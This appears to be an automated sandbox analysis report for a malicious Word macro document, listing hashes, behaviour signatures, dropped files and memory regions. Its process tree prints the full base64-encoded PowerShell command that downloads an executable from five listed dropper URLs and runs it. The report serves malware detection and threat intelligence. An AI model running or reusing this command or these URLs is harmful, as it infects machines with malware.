Analysis

  • max time kernel
    120s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    06-05-2024 20:20

General

  • Target

    1e35156777f498663f05a328abcfba80_JaffaCakes118.doc

  • Size

    123KB

  • MD5

    1e35156777f498663f05a328abcfba80

  • SHA1

    392937c8a098fcdca9d9cae58a5a05ec657f485f

  • SHA256

    9de70af07f1659f32c9e7aeb00a61ba1b1ca8e7985f1d5a3cc4197f67e8675b6

  • SHA512

    d259c69c274a7be8d768b426713336330b62bf94b836abcf38d4a5eeea24283242610b36ae7e488234482c73f2a76e6b98ea04603b2a13c68ef12c1b8acba0ef

  • SSDEEP

    3072:S77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q/tr0mTOl:S77HUUUUUUUUUUUUUUUUUUUT52V8r0m6

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://atlanticsg.com/wp-includes/fsfrz22_mkp29qlby-69478/

exe.dropper

http://eastpennlandscape.com/css/qhJUtdBFvM/

exe.dropper

http://mcs-interiors.co.uk/cgi-bin/MUbadZUIXD/

exe.dropper

http://laderajabugo.navicu.com/wp-admin/6ohv5j_6m40d-4652183/

exe.dropper

http://banphongresort.com/wp-includes/8hxbg02o_wkpvf-27459009/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1e35156777f498663f05a328abcfba80_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1284
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2552
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy bypass -noprofile -e JABRAG4AZgB6AGoASAB3AD0AJwBGAGkAcQBMAGwAdwAnADsAJABOAGwATQBJAGQAawAgAD0AIAAnADcAMAA2ACcAOwAkAHcAcwBOAGQAMAA1AD0AJwBYAGgAUgBpAGkATwBQAGwAJwA7ACQAdQBVAEkARQBPAGYAMgB6AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABOAGwATQBJAGQAawArACcALgBlAHgAZQAnADsAJABaAEUAdwBCAFIAUwBPAD0AJwBuAEYAcAB6AGkAdwAnADsAJABUAHAAUwA0ADYAcwA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAbwBiAGoAZQBjAHQAJwApACAAbgBgAGUAdABgAC4AdwBFAGIAQwBgAGwASQBFAE4AdAA7ACQARAB3AGIAOQB6AHMAVwA9ACcAaAB0AHQAcABzADoALwAvAGEAdABsAGEAbgB0AGkAYwBzAGcALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGYAcwBmAHIAegAyADIAXwBtAGsAcAAyADkAcQBsAGIAeQAtADYAOQA0ADcAOAAvAEAAaAB0AHQAcAA6AC8ALwBlAGEAcwB0AHAAZQBuAG4AbABhAG4AZABzAGMAYQBwAGUALgBjAG8AbQAvAGMAcwBzAC8AcQBoAEoAVQB0AGQAQgBGAHYATQAvAEAAaAB0AHQAcAA6AC8ALwBtAGMAcwAtAGkAbgB0AGUAcgBpAG8AcgBzAC4AYwBvAC4AdQBrAC8AYwBnAGkALQBiAGkAbgAvAE0AVQBiAGEAZABaAFUASQBYAEQALwBAAGgAdAB0AHAAOgAvAC8AbABhAGQAZQByAGEAagBhAGIAdQBnAG8ALgBuAGEAdgBpAGMAdQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ANgBvAGgAdgA1AGoAXwA2AG0ANAAwAGQALQA0ADYANQAyADEAOAAzAC8AQABoAHQAdABwADoALwAvAGIAYQBuAHAAaABvAG4AZwByAGUAcwBvAHIAdAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AOABoAHgAYgBnADAAMgBvAF8AdwBrAHAAdgBmAC0AMgA3ADQANQA5ADAAMAA5AC8AJwAuAHMAUABsAEkAdAAoACcAQAAnACkAOwAkAEIAUwAyAHAAbQA1AHQAPQAnAGgAegBuAFUAYQBsACcAOwBmAG8AcgBlAGEAYwBoACgAJABHAGkAbQA4AHoAXwBHAFIAIABpAG4AIAAkAEQAdwBiADkAegBzAFcAKQB7AHQAcgB5AHsAJABUAHAAUwA0ADYAcwAuAEQAbwBXAE4ATABPAEEAZABmAEkATABFACgAJABHAGkAbQA4AHoAXwBHAFIALAAgACQAdQBVAEkARQBPAGYAMgB6ACkAOwAkAEwAUQBYADYAYQA2AD0AJwBoAEoAcwB6AHMAdwAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAJwArACcAbQAnACkAIAAkAHUAVQBJAEUATwBmADIAegApAC4ATABFAE4ARwB0AEgAIAAtAGcAZQAgADMAMwA2ADkAOQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAcwB0AEEAcgB0ACgAJAB1AFUASQBFAE8AZgAyAHoAKQA7ACQATABTAEkAMwA0AEsARgA9ACcAaABjAEgANwBWAGYAJwA7AGIAcgBlAGEAawA7ACQATwBoADUAdABtAFkAbQA9ACcAbgBBADQAaQAyAEcAYQB1ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAWQBVAEYAUwBqAD0AJwBvAEcAcwB3AE4AdQAnAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2920

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5AC33306.wmf

      Filesize

      444B

      MD5

      4efdad044bd02a0f446f1a41c295de6a

      SHA1

      a9c34fd513297d7b087ff5e83bfb96cf9d4175cf

      SHA256

      484834655b38e6b99a9e36d769d1ea01ddd819adf73a9ab8b827d46550cd9b5e

      SHA512

      02f7e3a21bffe414dbb4a68f64d217ee4b5a07921ee4990db5c1fa596c51c6f68f3948e234448ad9f8d2bfd0ebe5195e66bed90ba6850ba6147e87db2631a971

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C49C3D04.wmf

      Filesize

      444B

      MD5

      fee05342e6ae169e7b1ab3e4ac71b982

      SHA1

      72c5f94b7dca7d3beb62fe34fc21e1c27a7a53e2

      SHA256

      2aa604b9f39527c71f3c5807372c2308a3777dfe6afc74d79181149525081aa3

      SHA512

      73f1d830acdd8074434ad3a2b8f0b57c8cc773ad9e600196eeaff82b609ec2c5a096307e51f7536892d1ef3a38969ec1f87b82d9ef2d330a2ef9992e4ed26c3d

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      98f3ef791021b7695038b71977e995f2

      SHA1

      fa61756d9ff0b46a605b79431bdc344eaf41fe25

      SHA256

      75637814566bc32887dfba21a7184e37f97bb18770fa32c41dd5543e6c1a8393

      SHA512

      0ce72b39779c9eb2d4ce1e21d4264ca1dde969b6044dd138fa4ff63e6f4a9f50a1f0d4e14604cf056d84adcc0344f1e9feb84ee59c4ca5be4f936eb9f326d25d

    • memory/1284-27-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/1284-20-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/1284-2-0x000000007101D000-0x0000000071028000-memory.dmp

      Filesize

      44KB

    • memory/1284-22-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/1284-21-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/1284-23-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/1284-36-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/1284-35-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/1284-32-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/1284-0-0x000000002FB91000-0x000000002FB92000-memory.dmp

      Filesize

      4KB

    • memory/1284-26-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/1284-7-0x0000000006360000-0x0000000006460000-memory.dmp

      Filesize

      1024KB

    • memory/1284-37-0x00000000064A0000-0x00000000065A0000-memory.dmp

      Filesize

      1024KB

    • memory/1284-84-0x000000007101D000-0x0000000071028000-memory.dmp

      Filesize

      44KB

    • memory/1284-75-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1284-57-0x000000007101D000-0x0000000071028000-memory.dmp

      Filesize

      44KB

    • memory/1284-58-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/1284-59-0x00000000064A0000-0x00000000065A0000-memory.dmp

      Filesize

      1024KB

    • memory/1284-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2920-44-0x00000000027D0000-0x00000000027D8000-memory.dmp

      Filesize

      32KB

    • memory/2920-43-0x000000001B210000-0x000000001B4F2000-memory.dmp

      Filesize

      2.9MB